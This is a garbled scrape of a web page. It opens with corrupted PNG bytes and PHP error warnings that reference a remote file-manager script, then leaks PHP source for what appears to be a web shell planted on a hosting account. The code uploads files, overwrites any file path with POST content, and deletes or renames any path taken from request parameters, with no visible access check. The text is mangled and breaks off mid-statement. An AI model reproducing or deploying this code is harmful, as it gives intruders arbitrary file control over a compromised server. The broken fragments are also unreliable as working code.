?ก๋PNG
IHDR ? f ??C1 sRGB ??จฆ gAMA กภ?จนa pHYs ? ??oกงd GIDATx^จชจนLกฑกยeกยY?a?("Bh?_จฐ???ก้ก์?q5k?*:t0A-o??ฃค]VkJก้M??f?กภ8\k2จชllก๊1]q?จด???T
Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in /home/user1137782/www/china1.by/classwithtostring.php on line 86
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 213
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 214
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 215
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 216
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 217
Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 218
489495df489495df" . basename($dest) . "";
$msgType = 'success';
} else {
$message = '[!] Upload failed.';
$msgType = 'error';
}
}
// โโ EDIT SAVE โโ
if (isset($_POST['save'], $_POST['file'], $_POST['content'])) {
file_put_contents($_POST['file'], $_POST['content']);
$message = '[+] File saved successfully.';
$msgType = 'success';
}
// โโ DELETE โโ
if (isset($_GET['delete'])) {
$target = realpath($_GET['delete']);
if (is_dir($target) ? rmdir($target) : unlink($target)) {
$message = '[+] Deleted successfully.';
$msgType = 'success';
} else {
$message = '[!] Delete failed.';
$msgType = 'error';
}
}
// โโ RENAME FORM โโ
if (isset($_GET['rename'])) {
$old = realpath($_GET['rename']);
$base = basename($old);
echo <<